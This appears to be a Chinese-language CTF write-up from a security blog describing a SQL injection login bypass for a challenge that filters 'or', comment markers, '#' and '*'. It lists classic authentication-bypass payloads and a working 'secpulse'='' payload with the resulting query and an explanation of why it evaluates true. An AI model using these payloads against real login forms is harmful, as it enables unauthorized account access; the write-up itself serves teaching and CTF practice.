记一道CTF 中遇到的SQL注入新型万能密码问题

2018-10-08 18,719

0x00. 引言

我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真,

但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union 关键字被过滤掉了,

下文我详细介绍我是如果绕过的,并给出一个新型SQL注入万能密码,也许在以后的CTF比赛中对大家有帮助。


0x01、新型万能密码

题目是这样的:


00659iwsgy1fcgvutx37bj30k102ldfs.jpg


根据提示,应该是过滤了常见的注入手段


猜测后台是这样的逻辑:


select * from table where username= '用户名' and password = '密码';



先试试常规万能密码:

admin' or 1=1-- -


2.jpgor 和 --被过滤掉了,这条路估计走不通,试试其他形式的 :比如利用注释:

username:admin'/*hello
passeord = world*/#'



发现 # 和 * 被过滤掉了,没有了or ,#, * 就不能万能密码了吗? 显然不是


最后通过的是这样payload,也就是我今天要介绍的新型万能密码:


 username =  secpulse'='  password = secpulse'='


拼接起来就是:

select * from table where username='secpulse'='' and passowrd = 'secpulse'='';


sql解释引擎是从左至右执行: 数据库肯定没有secpulse这个用户,结果是false flase = '' 结果就是 true啊


password 同理,然后获得flag, 美滋滋:
3.png

0x02. 总结


CTF这类比赛的好处就是可以遇到各种生产环境中没有的场景,给我们提供了各种起奇淫技巧施展的舞台,可以打开我们的弄懂,对以后的渗透测试是有很大好处的。


本文作者:hOlKSOMX

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/76200.html

Tags:
评论  (2)
快来写下你的想法吧!

hOlKSOMX

文章数:5 积分: 69

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号